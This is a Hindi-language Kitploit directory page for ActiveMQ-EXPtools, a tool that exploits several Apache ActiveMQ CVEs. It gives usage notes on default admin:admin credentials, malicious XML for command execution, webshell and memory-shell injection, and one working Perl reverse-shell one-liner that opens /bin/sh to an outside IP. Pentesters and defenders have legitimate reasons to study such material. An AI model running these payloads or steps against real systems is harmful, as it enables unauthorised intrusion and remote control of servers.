Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ActiveMQ-EXPtools — Apache ActiveMQ कमजोरियों का व्यापक शोषण उपकरण (CVE-2015-5254, CVE-2016-3088, CVE-2022-41678, CVE-2023-46604, CVE-2024-32114, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588) | Kitploit
उपकरण/GitHubGitHub/catherines77/activemq-exptools
भेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubcatherines77/activemq-exptools

ActiveMQ-EXPtools

Apache ActiveMQ कमजोरियों का व्यापक शोषण उपकरण (CVE-2015-5254, CVE-2016-3088, CVE-2022-41678, CVE-2023-46604, CVE-2024-32114, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588)

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
8391 महीना पहलेKitploit द्वारा समीक्षित

ActiveMQ-EXPtools

Apache ActiveMQ में कमजोरियों का पता लगाने और उनका शोषण करने का समर्थन करता है, CVE-2015-5254, CVE-2016-3088, CVE-2022-41678, CVE-2023-46604, CVE-2024-32114, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588

image-20260420111234916

[!WARNING] यह उपकरण केवल सुरक्षा अनुसंधान और शिक्षण उद्देश्यों के लिए है। उपयोगकर्ता इस उपकरण के उपयोग से उत्पन्न सभी कानूनी और संबंधित जिम्मेदारियों को स्वयं वहन करेगा। कृपया सुनिश्चित करें कि आपका व्यवहार स्थानीय कानूनों और नियमों के अनुरूप है। लेखक कोई जिम्मेदारी नहीं लेता है। यदि आप सहमत नहीं हैं, तो इस उपकरण का उपयोग न करें।

jdk8 पर चलता है, Openwire डिफ़ॉल्ट पोर्ट 61616 है, कभी-कभी लक्ष्य वातावरण खुला नहीं हो सकता है। Apache ActiveMQ का डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड admin:admin है। BeanXML सेटिंग पैनल संबंधित कमांड निष्पादित करने के लिए दुर्भावनापूर्ण XML उत्पन्न कर सकता है। यदि कोई समस्या है, तो कृपया Issue खोलें।

कमजोरी का पता लगाते समय, दुर्भावनापूर्ण XML सर्वर पते को dnslog पर सेट किया जा सकता है। यदि अनुरोध प्राप्त होता है, तो यह संकेत देता है कि CVE-2023-46604, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588 मौजूद हो सकते हैं।

कुछ कमजोरियों के शोषण के लिए नोट्स

CVE-2015-5254

java-chains डिसीरियलाइज़ेशन डेटा उत्पन्न करता है, कमजोरी को सत्यापित करने के लिए URLDNS का उपयोग किया जा सकता है

रिवर्स शेल के लिए perl का उपयोग करना सबसे अच्छा है, sh और bash कभी-कभी काम नहीं करते

root@kitploit:~
/usr/bin/perl -e 'use Socket;$i="192.168.239.129";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

image-20260420110252750

CVE-2022-41678

कस्टम वेबशेल लिखते समय, बिंगशी (BingXie) शेल लिखने पर 500 त्रुटि होगी, गॉडज़िला (Godzilla) सामान्य है। उपकरण कनेक्ट करते समय प्रमाणीकरण हेडर जोड़ना सुनिश्चित करें।

मेमोरी शेल इंजेक्शन

संस्करण 1.4 से, मेमोरी शेल जनरेशन मॉड्यूल MemShellParty को एकीकृत नहीं किया गया है। एक तरफ, fatjar पैकेज भारी है, दूसरी तरफ, springbeanxmlclassloader के लिए आवश्यक base64 डिकोडिंग विधि विभिन्न Java संस्करणों में सार्वभौमिक नहीं है, जिससे उपकरण को पहिया का पुन: आविष्कार करना पड़ता है। मेमोरी शेल की आवश्यकता वाले उपयोगकर्ता नीचे दिए गए XML जनरेशन प्रक्रिया का संदर्भ ले सकते हैं:

पहले MemShellParty में संबंधित मेमोरी शेल base64 स्ट्रिंग उत्पन्न करें https://party.mem.mk/ui

image-20260508110638599

फिर java-chains पर जाएं, Generate-OtherPayload ढूंढें, और कस्टम बाइटकोड चुनें

0

JDK संस्करण के अनुसार base64 डिकोडिंग विधि चुनें, डिफ़ॉल्ट decodeFromString विधि है, जबकि vulhub में CVE-2026-34197 लैब के लिए java.util.Base64 चुनना आवश्यक है

अंत में मेमोरी शेल Base64 स्ट्रिंग दर्ज करें और जनरेट पर क्लिक करें

image-20260508110858921

फ़िल्टर, लिसनर या सर्वलेट प्रकार के लिए, मेमोरी शेल कनेक्शन पते पर पथ /admin/, /api/, और प्रमाणीकरण हेडर जोड़ना आवश्यक है, हैंडलर को पथ और प्रमाणीकरण हेडर फ़ील्ड की आवश्यकता नहीं है

धन्यवाद

https://github.com/URJACK2025/CVE-2022-41678

https://github.com/vulhub/vulhub

https://github.com/ReaJason/MemShellParty

https://github.com/1diot9/MyJavaSecStudy/blob/5504868a7cba4bf674fe6974fe8f613e556e5d42/Apache/ActiveMQ/CVE-2026-40466/poc/CVE-2026-40466_HTTP_Discovery_RCE_Analysis.md

https://github.com/vulhub/java-chains

टूल डाउनलोड करें